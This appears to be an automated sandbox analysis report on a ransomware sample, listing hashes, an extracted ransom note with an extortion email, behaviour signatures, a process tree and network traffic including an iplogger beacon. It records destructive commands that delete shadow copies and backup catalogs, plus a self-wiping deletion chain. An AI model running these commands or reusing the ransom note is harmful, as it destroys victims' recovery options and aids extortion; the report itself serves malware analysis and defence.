Resubmissions

25/03/2025, 13:12 UTC

250325-qfl42aznw9 10

25/03/2025, 13:09 UTC

250325-qdtq4aznv6 10

25/03/2025, 13:05 UTC

250325-qbtcjszns3 10

25/03/2025, 13:01 UTC

250325-p9k86awxat 10

25/03/2025, 12:55 UTC

250325-p58tnawwe1 10

25/03/2025, 12:51 UTC

250325-p3txqazmt6 10

05/02/2025, 11:16 UTC

250205-ndjvsavrdm 10

16/07/2024, 08:54 UTC

240716-kt64gavakp 10

Analysis

  • max time kernel
    99s
  • max time network
    104s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    25/03/2025, 13:01 UTC

General

  • Target

    56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe

  • Size

    42KB

  • MD5

    abb04a0418be9cc4618f393d7fc9d76b

  • SHA1

    dbe3b07ab1383e4d693bb6cab17ad8a7c1c5cd7b

  • SHA256

    56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659

  • SHA512

    f7bce71f01ffae675a8b8a23a8f2e4d162ccefc349beadb84ffcca890dc68ed636acf4f7d694145c779125078f6634f30aed5f5651ee6c12dc4768f7c0a0f47b

  • SSDEEP

    768:QO1oR/8VS1RzK4wbs+D/SIJX+ZZ1SQQwZuIOPzDsHw67ZY23IWSjNV:QgS1FKnDtkuImsHw6V73ejNV

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\+README-WARNING+.txt

Ransom Note

::: Greetings :::
Little FAQ:
.1. Q: Whats Happen?
A: Your files have been encrypted. The file structure was not damaged, we did everything possible so that this could not happen.
.2. Q: How to recover files?
A: If you wish to decrypt your files you will need to pay us.
.3. Q: What about guarantees?
A: Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will cooperate with us. Its not in our interests. To check the ability of returning files, you can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!) and low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.
.4. Q: How to contact with you?
A: You can write us to our mailbox: ardellchadwick275@msgsafe.io
.5. Q: How will the decryption process proceed after payment?
A: After payment we will send to you our scanner-decoder program and detailed instructions for use. With this program you will be able to decrypt all your encrypted files.
.6. Q: If I don't want to pay bad people like you?
A: If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause only we have the private key. In practice - time is much more valuable than money.
:::BEWARE:::
DON'T try to change encrypted files by yourself! If you will try to use any third party software for restoring your data or antivirus solutions - please make a backup for all encrypted files! Any changes in encrypted files may entail damage of the private key and, as result, the loss all data.

Emails

ardellchadwick275@msgsafe.io

Signatures

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (8309) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe
    "C:\Users\Admin\AppData\Local\Temp\56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe"
    1⤵
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2132
    • C:\Users\Admin\AppData\Local\Temp\56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe
      "C:\Users\Admin\AppData\Local\Temp\56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe" n2132
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2292
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2128
      • C:\Windows\system32\vssadmin.exe
        vssadmin delete shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:2984
      • C:\Windows\system32\wbadmin.exe
        wbadmin delete catalog -quiet
        3⤵
        • Deletes backup catalog
        PID:2832
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic shadowcopy delete
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2644
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ping 1.1.1.1 -n 5 & fsutil file setZeroData offset=0 length=131072 "C:\Users\Admin\AppData\Local\Temp\56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe" & del /q /f "C:\Users\Admin\AppData\Local\Temp\56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe"
      2⤵
      • Deletes itself
      • System Location Discovery: System Language Discovery
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:2044
      • C:\Windows\SysWOW64\PING.EXE
        ping 1.1.1.1 -n 5
        3⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2388
      • C:\Windows\SysWOW64\fsutil.exe
        fsutil file setZeroData offset=0 length=131072 "C:\Users\Admin\AppData\Local\Temp\56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1772
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2768
  • C:\Windows\system32\wbengine.exe
    "C:\Windows\system32\wbengine.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2748
  • C:\Windows\System32\vdsldr.exe
    C:\Windows\System32\vdsldr.exe -Embedding
    1⤵
    PID:3036
  • C:\Windows\System32\vds.exe
    C:\Windows\System32\vds.exe
    1⤵
    PID:2756
  • C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    1⤵
    PID:1088

Network

  • US
    DNS
    iplogger.com
    56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe
    Remote address:
    8.8.8.8:53
    Request
    iplogger.com
    IN A
    Response
    iplogger.com
    IN A
    104.21.76.57
    iplogger.com
    IN A
    172.67.188.178
  • US
    GET
    https://iplogger.com/1QhhX4
    56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe
    Remote address:
    104.21.76.57:443
    Request
    GET /1QhhX4 HTTP/1.1
    Referer: 74B92775;2.22
    Host: iplogger.com
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Tue, 25 Mar 2025 13:04:15 GMT
    Content-Type: image/png
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: 443237163563470739=1; expires=Wed, 25 Mar 2026 13:04:15 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
    Set-Cookie: clhf03028ja=212.102.63.147; expires=Wed, 25 Mar 2026 13:04:15 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
    memory: 0.41068267822265625
    expires: Tue, 25 Mar 2025 13:04:15 +0000
    Cache-Control: no-store, no-cache, must-revalidate
    strict-transport-security: max-age=604800
    strict-transport-security: max-age=31536000
    content-security-policy: img-src https: data:; upgrade-insecure-requests
    x-frame-options: SAMEORIGIN
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LvMZ8sf8%2Fg%2FggSbvhnGSLS3p6CMh0vksF%2FA0BhByDmKj3txb%2Fb4WNIkFSNr82yq13vDkQBD9ok94gv7newK4GrXH3fxwgW6096s9xpL6osOpgIkNDfX8VWGkGVUR8wM%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 925e9cf11db2bec9-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=46417&min_rtt=21362&rtt_var=54240&sent=6&recv=6&lost=0&retrans=0&sent_bytes=3133&recv_bytes=411&delivery_rate=152334&cwnd=253&unsent_bytes=0&cid=167ad39131ee6508&ts=356&x=0"
  • US
    DNS
    c.pki.goog
    56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe
    Remote address:
    8.8.8.8:53
    Request
    c.pki.goog
    IN A
    Response
    c.pki.goog
    IN CNAME
    pki-goog.l.google.com
    pki-goog.l.google.com
    IN A
    142.250.179.227
  • GB
    GET
    http://c.pki.goog/r/gsr1.crl
    56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe
    Remote address:
    142.250.179.227:80
    Request
    GET /r/gsr1.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: c.pki.goog
    Response
    HTTP/1.1 200 OK
    Accept-Ranges: bytes
    Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
    Cross-Origin-Resource-Policy: cross-origin
    Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
    Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
    Content-Length: 1739
    X-Content-Type-Options: nosniff
    Server: sffe
    X-XSS-Protection: 0
    Date: Tue, 25 Mar 2025 12:31:21 GMT
    Expires: Tue, 25 Mar 2025 13:21:21 GMT
    Cache-Control: public, max-age=3000
    Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT
    Content-Type: application/pkix-crl
    Vary: Accept-Encoding
    Age: 1974
  • GB
    GET
    http://c.pki.goog/r/r4.crl
    56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe
    Remote address:
    142.250.179.227:80
    Request
    GET /r/r4.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: c.pki.goog
    Response
    HTTP/1.1 200 OK
    Accept-Ranges: bytes
    Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
    Cross-Origin-Resource-Policy: cross-origin
    Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
    Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
    Content-Length: 436
    X-Content-Type-Options: nosniff
    Server: sffe
    X-XSS-Protection: 0
    Date: Tue, 25 Mar 2025 12:19:56 GMT
    Expires: Tue, 25 Mar 2025 13:09:56 GMT
    Cache-Control: public, max-age=3000
    Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
    Content-Type: application/pkix-crl
    Vary: Accept-Encoding
    Age: 2659
  • 104.21.76.57:443
    https://iplogger.com/1QhhX4
    tls, http
    56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe
    859 B
    5.2kB
    10
    11

    HTTP Request

    GET https://iplogger.com/1QhhX4

    HTTP Response

    200
  • 142.250.179.227:80
    http://c.pki.goog/r/r4.crl
    http
    56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe
    600 B
    5.0kB
    8
    6

    HTTP Request

    GET http://c.pki.goog/r/gsr1.crl

    HTTP Response

    200

    HTTP Request

    GET http://c.pki.goog/r/r4.crl

    HTTP Response

    200
  • 8.8.8.8:53
    iplogger.com
    dns
    56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe
    58 B
    90 B
    1
    1

    DNS Request

    iplogger.com

    DNS Response

    104.21.76.57
    172.67.188.178

  • 8.8.8.8:53
    c.pki.goog
    dns
    56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe
    56 B
    107 B
    1
    1

    DNS Request

    c.pki.goog

    DNS Response

    142.250.179.227

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Temp\+README-WARNING+.txt

    Filesize

    1KB

    MD5

    29abe2cf61968275a38bcf735c875d5d

    SHA1

    4386674a153df8a4a1dc81bcf976ffae29299b2f

    SHA256

    463c885a5b5cf4b8447e11fddf5b2028c8adf0974f6bb3178454bf26bb3082e6

    SHA512

    261193ffe16866ed90f20ef293876c619393ce7e29a75cfba87badd2f34f2bed8338728a0a0ce505b6817adab04e9e22826cdd42f7917b434c1b978f07dc5871
